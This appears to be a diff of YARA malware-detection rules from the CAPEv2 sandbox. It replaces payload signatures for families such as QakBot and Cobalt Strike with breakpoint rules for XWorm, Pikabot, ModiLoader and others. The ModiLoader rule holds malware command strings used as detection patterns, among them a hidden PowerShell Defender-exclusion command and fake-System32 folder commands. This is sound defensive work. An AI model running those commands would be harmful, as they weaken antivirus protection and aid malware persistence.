+		cape_options = "bp0=$trap+43,action0=skip,count=0"
 
 	strings:
-		$crypt1 = {8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08 33 D8 8B C3 42 8B D8 32 1A 0F B6 DB 8B 1C 9F C1 E8 08}
-		$crypt2 = {8B 4C 82 0C 8B D9 C1 E3 18 C1 E9 08 0B D9 8B CB 0F B6 D9 8B 1C 9D AC 0C 43 00 89 5C 24 04 8B D9 C1 EB 08 0F B6 DB 8B 34 9D AC 0C 43 00 8B D9 C1 EB 10}
-		$crypt3 = {8B 13 8B CA 81 E1 80 80 80 80 8B C1 C1 E8 07 50 8B C1 59 2B C1 25 1B 1B 1B 1B 8B CA 81 E1 7F 7F 7F 7F 03 C9 33 C1 8B C8 81 E1 80 80 80 80 8B F1 C1 EE 07}
+		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-
-rule CAPE_Nighthawk
+rule CAPE_Xworm_1
 {
 	meta:
-		description = "NightHawk C2"
-		author = "Nikhil Ashok Hegde <@ka1do9>"
-		id = "096b9d13-6aa7-5b6e-aaeb-e25aa7c8c53f"
-		date = "2022-12-05"
-		modified = "2022-12-05"
+		description = "XWorm Config Extractor"
+		author = "kevoreilly"
+		id = "0f55dbfb-c239-53f2-a1e0-bfa494558d6e"
+		date = "2023-11-07"
+		modified = "2023-11-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Nighthawk.yar#L3-L24"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "2d77912678e06503ffef0e8ed84aa4f9ac74357480d57742fbae619acebfb5f2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/XWorm.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "d8e103f3470e83d71cd4992b74698c0721b8a69d764fdb7a4543997b2853014a"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "Nighthawk Payload"
+		cape_options = "bp0=$decrypt+11,action0=string:r10,count=1,typestring=XWorm Config"
 
 	strings:
-		$keying_methods = { 85 C9 74 43 83 E9 01 74 1C 83 F9 01 0F 85 }
-		$aes_sbox = { 63 7C 77 7B F2 6B 6F C5 30 }
-		$aes_inv_sbox = { 52 09 6A D5 30 36 A5 38 BF }
+		$decrypt = {45 33 C0 39 09 FF 15 [4] 48 8B F0 E8 [4] 48 8B C8 48 8B D6 48 8B 00 48 8B 40 68 FF 50 ?? 90}
 
 	condition:
-		pe.is_pe and for any s in pe.sections : ( s.name == ".profile" ) and all of them
+		any of them
 }
-rule CAPE_Smokeloader_1
+rule CAPE_Blister_1 : FILE
 {
 	meta:
-		description = "SmokeLoader Payload"
+		description = "Blister Sleep Bypass"
 		author = "kevoreilly"
-		id = "d3ca7c8a-01dc-5174-9928-ee278b6cb107"
-		date = "2024-11-12"
-		modified = "2024-11-12"
+		id = "34657bab-f100-5ea8-9111-da2806f46b79"
+		date = "2024-05-09"
+		modified = "2024-05-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/SmokeLoader.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "779e2ac213e5ced7bc06e6208826b65cf8fc3113a69ede6408b84055542fa76d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Blister.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "aba379b93c85241cf250829832b2c8a5eaafb3abd0ff955dbaf0d06489c00deb"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "SmokeLoader Payload"
+		tags = "FILE"
+		cape_options = "bp0=$sleep1+6,bp1=$sleep2+7,action0=setsignflag,action1=clearcarryflag,count=3"
+		packed = "0a7778cf6f9a1bd894e89f282f2e40f9d6c9cd4b72be97328e681fe32a1b1a00"
+		packed = "afb77617a4ca637614c429440c78da438e190dd1ca24dc78483aa731d80832c2"
 
 	strings:
-		$rc4_decrypt64 = {41 8D 41 01 44 0F B6 C8 42 0F B6 [2] 41 8D 04 12 44 0F B6 D0 42 8A [2] 42 88 [2] 42 88 [2] 42 0F B6 [2] 03 CA 0F B6 C1 8A [2] 30 0F 48 FF C7 49 FF CB 75}
-		$rc4_decrypt32 = {47 B9 FF 00 00 00 23 F9 8A 54 [2] 0F B6 C2 03 F0 23 F1 8A 44 [2] 88 44 [2] 88 54 [2] 0F B6 4C [2] 0F B6 C2 03 C8 81 E1 FF 00 00 00 8A 44 [2] 30 04 2B 43 3B 9C 24 [4] 72 C0}
-		$fetch_c2_64 = {74 ?? B? E8 03 00 00 B9 58 02 00 00 FF [5] 48 FF C? 75 F0 [6-10] 48 8D 05}
-		$fetch_c2_32 = {8B 96 [2] (00|01) 00 8B CE 5E 8B 14 95 [4] E9}
+		$sleep1 = {FF FF 83 7D F0 00 (E9|0F 8?)}
+		$sleep2 = {81 7D D8 90 B2 08 00 (E9|0F 8?)}
+		$protect = {50 6A 20 8D 45 ?? 50 8D 45 ?? 50 6A FF FF D7}
+		$lock = {56 33 F6 B9 FF FF FF 7F 89 75 FC 8B C1 F0 FF 45 FC 83 E8 01 75 F7}
+		$comp = {6A 04 59 A1 [4] 8B 78 04 8B 75 08 33 C0 F3 A7 75 0B 8B 45 0C 83 20 00 33 C0 40 EB 02 33 C0}
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5A4D and 2 of ( $protect , $lock , $comp ) and all of ( $sleep* )
 }
-rule CAPE_Zloader_1 : FILE
+rule CAPE_Smokeloader_1 : FILE
 {
 	meta:
-		description = "Zloader Payload"
-		author = "kevoreilly, enzok"
-		id = "a4250532-ddfc-58c2-bbae-82cc201d0c5d"
-		date = "2025-04-07"
-		modified = "2025-04-07"
+		description = "SmokeLoader Payload"
+		author = "kevoreilly"
+		id = "9df0eca1-009f-5e7e-af9f-9529581fb4b4"
+		date = "2023-02-06"
+		modified = "2023-02-06"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Zloader.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa"
-		logic_hash = "525670973b67aac048199529c97d6be00b0a8cca9bc90deb647366d92a5ea540"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/SmokeLoader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "4b15162f4b754cdd6a9124f29f0fd979085734063a0b17f2a97a9750f29e2e0b"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Zloader Payload"
+		cape_options = "bp0=$gate+19,action0=DumpSectionViews,count=1"
 
 	strings:
-		$rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)}
-		$decrypt_conf = {83 C4 04 84 C0 74 5? E8 [4] E8 [4] E8 [4] E8 [4] ?8 [4] ?8 [4] ?8}
-		$decrypt_conf_1 = {48 8d [5-11] e8 [4] 48 [3-4] 48 [3-4] 48 [6] E8}
-		$decrypt_conf_2 = {48 8d [5] 4? [5] e8 [4] 48 [3-4] 48 8d [5] E8 [4] 48}
-		$decrypt_key_1 = {66 89 C2 4? 8D 0D [3] 00 4? B? FC 03 00 00 E8 [4] 4? 83 C4 [1-2] C3}
-		$decrypt_key_2 = {48 8d 0d [3] 00 66 89 ?? 4? 89 F0 4? [2-5] E8 [4-5] 4? 83 C4}
-		$decrypt_key_3 = {48 8d 0d [3] 00 e8 [4] 66 89 [3] b? [4] e8 [4] 66 8b}
+		$gate = {68 [2] 00 00 50 E8 [4] 8B 45 ?? 89 F1 8B 55 ?? 9A [2] 40 00 33 00 89 F9 89 FA 81 C1 [2] 00 00 81 C2 [2] 00 00 89 0A 8B 46 ?? 03 45 ?? 8B 4D ?? 8B 55 ?? 9A [2] 40 00 33 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $decrypt_conf* ) and ( 1 of ( $decrypt_key* ) or $rc4_init )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Cobaltstrikestager
+rule CAPE_Agentteslav3Jit
 {
 	meta:
-		description = "Cobalt Strike Stager Payload"
-		author = "@dan__mayer <daniel@stairwell.com>"
-		id = "eedf71b1-9f27-5a6f-afe8-3ddae47f9a06"
-		date = "2023-01-18"
-		modified = "2023-01-18"
+		description = "AgentTesla V3 JIT native string decryption"
+		author = "ClaudioWayne"
+		id = "590c5058-c1db-5366-8db5-57449a178999"
+		date = "2024-02-27"
+		modified = "2024-02-27"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/CobaltStrikeStager.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6a55b0c3ab5f557dfb7a3f8bd616ede1bd9b93198590fc9d52aa19c1154388c5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/AgentTesla.yar#L16-L26"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "62a49cf4295df637f96ba7c127cfc4aeb9af2fcced497fdf34d726a062edc1ec"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "CobaltStrikeStager Payload"
+		cape_options = "bp0=$decode+20,count=0,action0=string:eax+8,typestring=AgentTesla Strings,no-logs=2"
 
 	strings:
-		$smb = { 68 00 B0 04 00 68 00 B0 04 00 6A 01 6A 06 6A 03 52 68 45 70 DF D4 }
-		$http_x86 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 }
-		$http_x64 = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 49 89 E6 4C 89 F1 41 BA 4C 77 26 07 }
-		$dns = { 68 00 10 00 00 68 FF FF 07 00 6A 00 68 58 A4 53 E5 }
+		$decode = {8B C8 57 FF 75 08 8B [5] 8B 01 8B 40 3C FF [2] 8B F0 B8 03 00 00 00}
 
 	condition:
-		any of them
+		all of them
 }
-rule CAPE_Ursnif : FILE
+rule CAPE_Risepro : FILE
 {
 	meta:
-		description = "Ursnif Payload"
-		author = "kevoreilly & enzo"
-		id = "200c2227-0d34-5e4a-b5aa-ab63a077d141"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "No description has been set in the source file - CAPE"
+		author = "kevoreilly"
+		id = "63d9cb19-0688-5632-8477-ce9b7e986a55"
+		date = "2023-12-16"
+		modified = "2023-12-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Ursnif.yar#L1-L19"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "46e79fde81ff5352314618021e394b2e0322df07170c7279363290b7134935fd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/RisePro.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "1b69a1dd5961241b926605f0a015fa17149c3b2759fb077a30a22d4ddcc273f6"
+		logic_hash = "055ca8328923b91f93c116e4a856366356fa11155f4e9fde95da31129b51386a"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Ursnif Payload"
+		cape_options = "bp0=$c2+15,action0=string:edx,bp1=$c2+41,action1=string:ecx,count=1"
 
 	strings:
-		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
-		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
-		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
-		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
-		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
-		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
-		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
-		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
+		$decode1 = {8A 06 46 84 C0 75 F9 2B F1 B8 FF FF FF 7F 8B 4D ?? 8B 51 ?? 2B C2 3B C6 72 38 83 79 ?? 10 72 02 8B 09 52 51 56 53 51 FF 75 ?? 8B CF E8}
+		$decode2 = {8B D9 81 FF FF FF FF 7F 0F [2] 00 00 00 C7 43 ?? 0F 00 00 00 83 FF 10 73 1A 57 FF 75 ?? 89 7B ?? 53 E8 [4] 83 C4 0C C6 04 1F 00 5F 5B 5D C2 08 00}
+		$c2 = {FF 75 30 83 3D [4] 10 BA [4] B9 [4] 0F 43 15 [4] 83 3D [4] 10 0F 43 0D [4] E8 [4] A3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) )
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Qakbot5_1 : FILE
+rule CAPE_Modiloader : FILE
 {
 	meta:
-		description = "QakBot v5 Payload"
-		author = "kevoreilly, enzok"
-		id = "48866cdd-f60e-50b8-85f9-573710934b0b"
-		date = "2024-04-28"
-		modified = "2024-04-28"
+		description = "ModiLoader detonation shim"
+		author = "kevoreilly"
+		id = "64f9aa51-d668-5d40-9781-c26970acf781"
+		date = "2025-01-31"
+		modified = "2025-01-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/QakBot.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "59559e97962e40a15adb2237c4d01cfead03623aff1725616caeaa5a8d273a35"
-		logic_hash = "cc23a92f45619d44af824128b743c259dd9dfa7cb5106932f3425f3dfd1dccdf"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/ModiLoader.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "1f0cbf841a6bc18d632e0bc3c591266e77c99a7717a15fc4b84d3e936605761f"
+		logic_hash = "9e64e0c40192cc832a1ffa7b3ac65a704596af82515d03706cd7aa1f4498f32f"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "QakBot Payload"
-		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
+		cape_options = "exclude-apis=NtAllocateVirtualMemory:NtProtectVirtualMemory"
 
 	strings:
-		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
-		$c2list = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 45 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
-		$campaign = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 44 24 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
+		$epilog1 = {81 C2 A1 03 00 00 87 D1 29 D3 33 C0 5A 59 59 64 89 10 68}
+		$epilog2 = {6A 00 6A 01 8B 45 ?? 50 FF 55 ?? 33 C0 5A 59 59 64 89 10 68}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule CAPE_Qakbot4_1 : FILE
+rule CAPE_Modiloaderold : FILE
 {
 	meta:
-		description = "QakBot v4 Payload"
-		author = "kevoreilly"
-		id = "d2c5316c-22cc-5b6d-b6a2-b1d23a06d16b"
-		date = "2024-04-28"
-		modified = "2024-04-28"
+		description = "ModiLoader detonation shim"
+		author = "ditekSHen"
+		id = "2b3fd8ec-b672-574b-9b50-1a9ca9f43299"
+		date = "2025-01-31"
+		modified = "2025-01-31"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/QakBot.yar#L17-L35"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "b2870e33abffbb3ff49b7891b0f5c538ab48ee63da5553929d4e37dec921344f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/ModiLoader.yar#L15-L53"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "fc006377e6d41515503b0b234ff87f59d930a7d9f8b32d2e072de79b9c52ddc4"
 		score = 75
-		quality = 70
+		quality = 66
 		tags = "FILE"
-		cape_type = "QakBot Payload"
+		cape_options = "ntdll-protect=0"
 
 	strings:
-		$crypto1 = {8B 5D 08 0F B6 C2 8A 16 0F B6 1C 18 88 55 13 0F B6 D2 03 CB 03 CA 81 E1 FF 00 00 80 79 08 49 81 C9 00 FF FF FF 41}
-		$sha1_1 = {5? 33 F? [0-9] 89 7? 24 ?? 89 7? 24 ?? 8? [1-3] 24 [1-4] C7 44 24 ?0 01 23 45 67 C7 44 24 ?4 89 AB CD EF C7 44 24 ?8 FE DC BA 98 C7 44 24 ?C 76 54 32 10 C7 44 24 ?0 F0 E1 D2 C3}
-		$sha1_2 = {33 C0 C7 01 01 23 45 67 89 41 14 89 41 18 89 41 5C C7 41 04 89 AB CD EF C7 41 08 FE DC BA 98 C7 41 0C 76 54 32 10 C7 41 10 F0 E1 D2 C3 89 41 60 89 41 64 C3}
-		$anti_sandbox1 = {8D 4? FC [0-1] E8 [4-7] E8 [4] 85 C0 7E (04|07) [4-7] 33 (C0|D2) 74 02 EB FA}
-		$anti_sandbox2 = {8D 45 ?? 50 E8 [2] 00 00 59 68 [4] FF 15 [4] 89 45 ?? 83 7D ?? 0F 76 0C}
-		$decrypt_config1 = {FF 37 83 C3 EC 53 8B 5D 0C 8D 43 14 50 6A 14 53 E8 ?? ?? ?? ?? 83 C4 14 85 C0 ?? 26 ?? ?? 86 20 02 00 00 66 85 C0 ?? ?? FF 37 FF 75 10 53}
-		$decrypt_config2 = {8B 45 08 8B 88 24 04 00 00 51 8B 55 10 83 EA 14 52 8B 45 0C 83 C0 14 50 6A 14 8B 4D 0C 51 E8 6C 08 00 00}
-		$decrypt_config3 = {6A 13 8B CE 8B C3 5A 8A 18 3A 19 75 05 40 41 4A 75 F5 0F B6 00 0F B6 09 2B C1 74 05 83 C8 FF EB 0E}
-		$call_decrypt = {83 7D ?? 00 56 74 0B FF 75 10 8B F3 E8 [4] 59 8B 45 0C 83 F8 28 72 19 8B 55 08 8B 37 8D 48 EC 6A 14 8D 42 14 52 E8}
+		$x1 = "*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@" fullword wide
+		$x2 = "dntdll" fullword wide
+		$x3 = "USERPROFILE" fullword wide
+		$s1 = "%s, ProgID: \"%s\"" ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
+		$s3 = "responsetext" ascii
+		$s4 = "C:\\Users\\Public\\" ascii
+		$s5 = "[InternetShortcut]" fullword ascii
+		$c1 = "start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command \"Add-MpPreference -ExclusionPath 'C:\\Users'\" & exit" ascii nocase
+		$c2 = "mkdir \"\\\\?\\C:\\Windows \"" ascii nocase
+		$c3 = "mkdir \"\\\\?\\C:\\Windows \\System32\"" ascii nocase
+		$c4 = "ECHO F|xcopy \"" ascii nocase
+		$c5 = "\"C:\\Windows \\System32\" /K /D /H /Y" ascii nocase
+		$c6 = "ping 127.0.0.1 -n 6 > nul" ascii nocase
+		$c7 = "del /q \"C:\\Windows \\System32\\*\"" ascii nocase
+		$c8 = "rmdir \"C:\\Windows \\System32\"" ascii nocase
+		$c9 = "rmdir \"C:\\Windows \"" ascii nocase
+		$g1 = "powershell" ascii nocase
+		$g2 = "mkdir \"\\\\?\\C:\\" ascii nocase
+		$g3 = "\" /K /D /H /Y" ascii nocase
+		$g4 = "ping 127.0.0.1 -n" ascii nocase
+		$g5 = "del /q \"" ascii nocase
+		$g6 = "rmdir \"" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $* )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and ( all of ( $g* ) or ( 2 of ( $s* ) and 2 of ( $c* ) ) ) ) or ( all of ( $s* ) and ( 2 of ( $c* ) or all of ( $g* ) ) ) or ( 4 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( all of ( $g* ) and 4 of ( $c* ) ) or 13 of them )
 }
-rule CAPE_Rozena
+rule CAPE_Pikahook : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "Kevin O'Reilly"
-		id = "38ca9da3-2a0e-500f-8eb8-9de69a7f2da5"
-		date = "2024-03-15"
-		modified = "2024-03-15"
+		description = "Pikabot anti-hook bypass"
+		author = "kevoreilly"
+		id = "e1b7a807-135f-52d7-bc36-c0419e82b424"
+		date = "2024-03-12"
+		modified = "2024-03-12"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Rozena.yar#L1-L10"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "c415a8108b58a125a604031bb8d73b58a8aae5429b5b765e35fa8a4add9cd135"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Pikabot.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "2a50a5f2d905122a5b7ac8ca3666b47caa24d325e246841129e53807daf2a1dd"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "Rozena Payload"
+		tags = "FILE"
+		cape_options = "clear,sysbp=$indirect+40,sysbpmode=1,force-sleepskip=1"
+		packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9"
 
 	strings:
-		$ip_port = {FF D5 6A 0A 68 [4] 68 [4] 89 E6 50 50 50 50 40 50 40 50 68 [4] FF D5}
-		$socket = {6A 00 6A 04 56 57 68 [4] FF D5 [0-5] 8B 36 6A 40 68 00 10 00 00 56 6A 00 68}
+		$indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1 [4] FF 15}
+		$sysenter1 = {89 44 24 08 8D 85 20 FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8}
+		$sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8}
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Rokrat : FILE
+rule CAPE_Pikexport : FILE
 {
 	meta:
-		description = "RokRat Payload"
+		description = "Pikabot export selection"
 		author = "kevoreilly"
-		id = "12e05b90-9771-5901-ae82-9fd2ea6263e7"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "7d2432f2-90ae-5ad0-b579-5789a1c14a08"
+		date = "2024-03-12"
+		modified = "2024-03-12"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/RokRat.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "2aaa7de7ccd59e0da690f4bc0c7deaacf61314d61f8d2aa3ce6f6892f50612ec"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/Pikabot.yar#L16-L28"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "238dcc5611ed9066b63d2d0109c9b623f54f8d7b61d5f9de59694cfc60a4e646"
+		logic_hash = "33f58703a0e40c2361343dbdcc17111aafbf5cc912393edda79005c6ec566f42"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "RokRat Payload"
+		cape_options = "export=$export"
 
 	strings:
-		$code1 = {8B 57 04 8D 7F 04 33 57 FC 81 E2 FF FF FF 7F 33 57 FC 8B C2 24 01 0F B6 C0 F7 D8 1B C0 D1 EA 25 DF B0 08 99 33 87 30 06 00 00 33 C2 89 87 3C F6 FF FF 83 E9 01 75 C9}
-		$string1 = "/pho_%s_%d.jpg" wide
+		$export = {55 8B EC 83 EC ?? C6 45 [2] C6 45 [2] C6 45 [2] C6 45 [2] C6 45}
+		$pe = {B8 08 00 00 00 6B C8 00 8B 55 ?? 8B 45 ?? 03 44 0A 78 89 45 ?? 8B 4D ?? 8B 51 18 89 55 E8 C7 45 F8 00 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $code* ) ) and ( any of ( $string* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Tclient : FILE
+rule CAPE_Bumblebeeshellcode_1
 {
 	meta:
-		description = "TClient Payload"
+		description = "BumbleBee Loader 2023"
 		author = "kevoreilly"
-		id = "38c9ea20-9d91-5fb0-8b3b-170538ad7ea8"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "20dd4668-497d-5f37-a61e-c154209503b8"
+		date = "2023-02-08"
+		modified = "2023-02-08"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/TClient.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6edcd01e4722b367723ed77d9596877d16ee35dc4c160885d125f83e45cee24d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/BumbleBee.yar#L18-L32"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "865510868ee7c089c2ada0645098e851ca2bb9084a74315ce16296eb19c93ab4"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "TClient Payload"
+		tags = ""
